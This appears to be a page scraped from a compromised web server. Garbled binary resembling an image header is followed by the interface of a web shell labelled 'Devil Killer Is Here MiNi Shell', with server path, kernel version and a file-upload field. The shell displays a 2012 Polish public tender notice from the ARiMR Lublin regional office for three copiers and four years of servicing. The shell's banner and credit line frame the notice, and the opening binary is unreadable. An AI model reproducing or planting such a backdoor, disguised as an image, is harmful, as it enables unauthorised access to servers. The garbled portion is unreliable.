JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120823/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120823/182137-N-2012.html

<p class="kh_header"><b>Ciecierzyn: Zakup 3 szt. cyfrowych kopiarek laserowych czarno-białych oraz objęcie ich obsługą serwisową dla potrzeb Biur Powiatowych Lubelskiego Oddziału Regionalnego Agencji Restrukturyzacji i Modernizacji Rolnictwa</b><br>
<b>Numer ogłoszenia: 182137 - 2012; data zamieszczenia: 23.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa Lubelski Oddział Regionalny , Elizówka 65A, 21-003 Ciecierzyn, woj. lubelskie, tel. 081 7568810, faks 081 7563941.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arimr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa osoba prawna - Agencja płatnicza.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup 3 szt. cyfrowych kopiarek laserowych czarno-białych oraz objęcie ich obsługą serwisową dla potrzeb Biur Powiatowych Lubelskiego Oddziału Regionalnego Agencji Restrukturyzacji i Modernizacji Rolnictwa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Na przedmiot zamówienia składa się dostawa, rozładunek i wniesienie do wskazanych przez Zamawiającego pomieszczeń fabrycznie nowych cyfrowych kopiarek laserowych czarno-białych z funkcją drukowania sieciowego oraz z funkcją skanera sieciowego (dalej: Sprzęt) do Biur Powiatowych Lubelskiego Oddziału Regionalnego ARiMR oraz objęcie ich obsługą serwisową (dalej: Serwis). 
2.	Rzeczowy i ilościowy zakres zamówienia: 
(ilość - 3 sztuki)
Cyfrowa kopiarka laserowa czarno-biała z funkcją drukowania sieciowego oraz z funkcją skanera sieciowego o parametrach technicznych:
2.1.	Parametry techniczne:
1)	prędkość skanowania, kopiowania, drukowania: nie mniej niż 75 kopii/minutę dla formatu A4
2)	format kopii minimum: od A5 do A3
3)	obsługa papieru o gramaturze minimum od 60 do 216 g/m2
4)	łączna pojemność podajników (bez podajnika ręcznego) minimum 4600 arkuszy A4 o gramaturze 75 g/m2
5)	taca odbiorcza min. 2000 arkuszy
6)	zmniejszenie/powiększenie: min. 25-400%
7)	rozdzielczość drukowania - 1200 x 1200 dpi
8)	automatyczny dwustronny podajnik oryginałów o pojemności min. 100 ark. o gramaturze 75 g/m2
9)	czas wydruku pierwszej strony nie więcej niż: 3 sek
10)	drukowanie sieciowe dwustronne
11)	dysk twardy min 80 GB
12)	pamięć 1024 MB
13)	karta sieciowa 1 Gbit
14)	języki drukowania: PCL 6/PCL 5e; emulacja PostScript 3
15)	automatyczne rozpoznawanie formatu papieru
16)	ekran dotykowy z graficznym interfejsem
17)	skanowanie sieciowe z szyby i ADF - kolorowe, dwustronne
18)	skanowanie do pliku PDF, JPG, TIFF
19)	skanowanie do sieciowego serwera pliku, skanowanie do e-maila
20)	zdalne zarządzanie i monitorowanie urządzenia poprzez sieć LAN
21)	funkcje wykończenia prac: zszywanie jedno- i wielopunktowe, zszywanie min 50 arkuszy, dziurkowanie dwuotworowe.
22)	materiały eksploatacyjne do samodzielnej wymiany przez użytkownika: toner i bęben. Dopuszcza się niewymienny bęben jeżeli wydajność bębna jest większa niż przewidywalna ilość wydruków podczas trwania umowy, tj. 960 000 stron (20 000 stron miesięcznie przez okres 48 miesięcy).
23)	dodatkowe materiały eksploatacyjne, które Wykonawca dostarczy wraz ze sprzętem: zszywki do urządzeń w ilości nie mniejszej niż 15 000 sztuk do każdej kopiarki, razem nie mniej niż 45 000 sztuk.
24)	gwarancja producenta: min. 24 miesiące od daty zakupu.

2.2.	Warunki utrzymania powyższych urządzeń:

1)	Wykonawca zobowiązuje się utrzymywać urządzenia określone w rozdziale III punkt 2.1. siwz w stanie przydatnym do użytku zgodnie z jego przeznaczeniem, przy zachowaniu jego parametrów technicznych zgodnych z specyfikacją producenta, przez okres 48 miesięcy od daty podpisania umowy.
2)	Do obowiązków Wykonawcy w ramach opłaty okresowej należy usuwanie awarii Sprzętu, dostarczanie niezbędnych materiałów eksploatacyjnych (toner, bęben) oraz niezbędnych części zamiennych na własny koszt.
3)	Do obowiązków Wykonawcy nie należy dostarczanie papieru oraz zszywek. Zamawiający używa papieru o następującej jakości: od 60 do 216 g/m2, białość 161 dpi oraz 146 dpi. Wykonawca oświadcza, że jest to papier właściwy do zaoferowanego Sprzętu.
4)	Wykonawca w ciągu 24 godzin od chwili poinformowania go przybędzie do miejsc dostaw Sprzętu w Biurach Powiatowych i podejmie czynności mające na celu usunięcie usterek. Zgłoszenia do Wykonawcy mogą być dokonywane drogą telefoniczną lub pocztą elektroniczną. Numery kontaktowe stron Umowy zostały ujęte w załączniku nr 3 do Umowy.
5)	Zamawiający obowiązany jest zapewnić Wykonawcy dostęp w godzinach od 08:30 do 15:00 każdego dnia roboczego do Sprzętu w celu realizacji czynności objętych umową/zamówieniem.
6)	Obsługa serwisowa Sprzętu może być dokonywana wyłącznie przez Wykonawcę, który ma autoryzację na sprzedaż i serwis zamawianego Sprzętu, chyba że warunki gwarancji przewidują inną możliwość wykonywania napraw objętych gwarancją.
7)	W razie nie usunięcia usterek Sprzętu w ciągu 48 godzin od chwili zgłoszenia, Wykonawca dostarczy zastępcze urządzenie najpóźniej czwartego dnia po dniu zgłoszenia o zbliżonych parametrach technicznych na okres wykonywania naprawy.
8)	Wykonawcy przysługuje wynagrodzenie w postaci opłaty miesięcznej. Opłata ta obliczana będzie jako iloczyn liczby wykonanych kopii przy użyciu Sprzętu oraz stawki za jedna kopię, określonej w ofercie.
9)	W celu ustalenia opłaty miesięcznej Wykonawca będzie odczytywać stan licznika Sprzętu najpóźniej w ostatnim dniu roboczym każdego miesiąca w obecności pracownika Zamawiającego. Odczyt będzie podstawą do wystawienia faktury VAT.

2.3.	Dostawa urządzeń:
1)	Termin dostawy Sprzętu - do 30 dni od dnia podpisania umowy, ale nie później niż do 
30 listopada 2012 r.
2)	Wykonawca zobowiązuje się dostarczyć i uruchomić Sprzęt w lokalizacjach podanych niżej:
1	BP Krasnystaw, 22-300 Krasnystaw ul. Browarna 1	1 sztuka
2	BP Opole Lubelskie, 24-300 Opole Lubelskie Al.600-lecia 42	1 sztuka
3	BP Włodawa, 22-200 Włodawa Al. Piłsudskiego 66	1 sztuka

3)	Zamawiający zastrzega sobie prawo zmiany miejsc dostaw w obrębie woj. lubelskiego, nie później niż trzy dni po podpisaniu umowy (Wykonawca rozpocznie dostawy po ostatecznej deklaracji miejsc dostaw lub po upłynięciu trzech dni od podpisania umowy).
3.	W przypadku stwierdzenia, że dostarczony Sprzęt / materiały eksploatacyjne:
a)	są niezgodne ze specyfikacją istotnych warunków zamówienia lub nie są kompletne,
b)	posiadają ślady zewnętrznego uszkodzenia,
c)	posiadają ślady wcześniejszego użytkowania,
d)	są niekompatybilne z urządzeniem, do którego są przeznaczone,
Zamawiający odmówi odbioru części lub całości Sprzętu / materiałów eksploatacyjnych, sporządzając protokół zawierający przyczyny odmowy odbioru. Zamawiający wyznacza termin dostarczenia Sprzętu / materiałów eksploatacyjnych fabrycznie nowych, wolnych od wad. Procedura czynności odbioru zostanie powtórzona.
4.	Pozostałe istotne wymagania Zamawiającego co do przedmiotu zamówienia i realizacji umowy zostały zawarte we wzorze umowy stanowiącej załącznik nr 4 do siwz.
5. TERMIN WYKONANIA ZAMÓWIENIA:
Dostawa Sprzętu - do 30 dni od dnia podpisania umowy, ale nie później niż do 30 listopada 2012 r.
Serwis dla Sprzętu - 48 miesięcy od daty dostawy Sprzętu. 

Zamówienie poniżej 130 000 euro.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.12.11.00-4, 50.31.00.00-1, 30.19.71.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie żąda</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień. Zamawiający uzna spełnienie w/w warunku na podstawie oświadczenia zgodnego ze wzorem wg załącznika nr 2 do SIWZ. Zamawiający zastosuje kryterium spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna spełnienie w/w warunku na podstawie oświadczenia zgodnego ze wzorem wg załącznika nr 2 do SIWZ. Zamawiający zastosuje kryterium spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna spełnienie w/w warunku na podstawie oświadczenia zgodnego ze wzorem wg załącznika nr 2 do SIWZ. Zamawiający zastosuje kryterium spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna spełnienie w/w warunku na podstawie oświadczenia zgodnego ze wzorem wg załącznika nr 2 do SIWZ. Zamawiający zastosuje kryterium spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna spełnienie w/w warunku na podstawie oświadczenia zgodnego ze wzorem wg załącznika nr 2 do SIWZ. Zamawiający zastosuje kryterium spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo (oryginał lub kopia poświadczona za zgodność z oryginałem przez wykonawcę) do podpisania oferty, jeżeli oferta nie została podpisana przez osoby upoważnione do tych czynności dokumentem rejestracyjnym.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a)	Zmiana miejsca świadczenia usługi Serwisu w przypadku zmiany miejsca lokalizacji urządzenia (Sprzętu).
b)	Zmiana stawki / wartości brutto należności za usługę Serwisu w związku ze zmianą obowiązującej stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arimr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Lubelski Oddział Regionalny ARiMR
Elizówka 65A k/Lublina
21-003 Ciecierzyn
pokój 006A (hala A).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.09.2012 godzina 09:30, miejsce: Lubelski Oddział Regionalny ARiMR
Elizówka 65A k/Lublina
21-003 Ciecierzyn
Kancelaria - budynek A (piętro I) pok. 104A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający dopuszcza porozumiewanie się drogą elektroniczną (e-mail Zamawiającego: lubelski@arimr.gov.pl).
Zamawiający nie przewiduje rozliczenia w walutach obcych.
Zamawiający nie przewiduje aukcji elektronicznej.
Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.
Zamawiający nie przewiduje wymagań, o których mowa w art. 29 ust. 4 Ustawy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com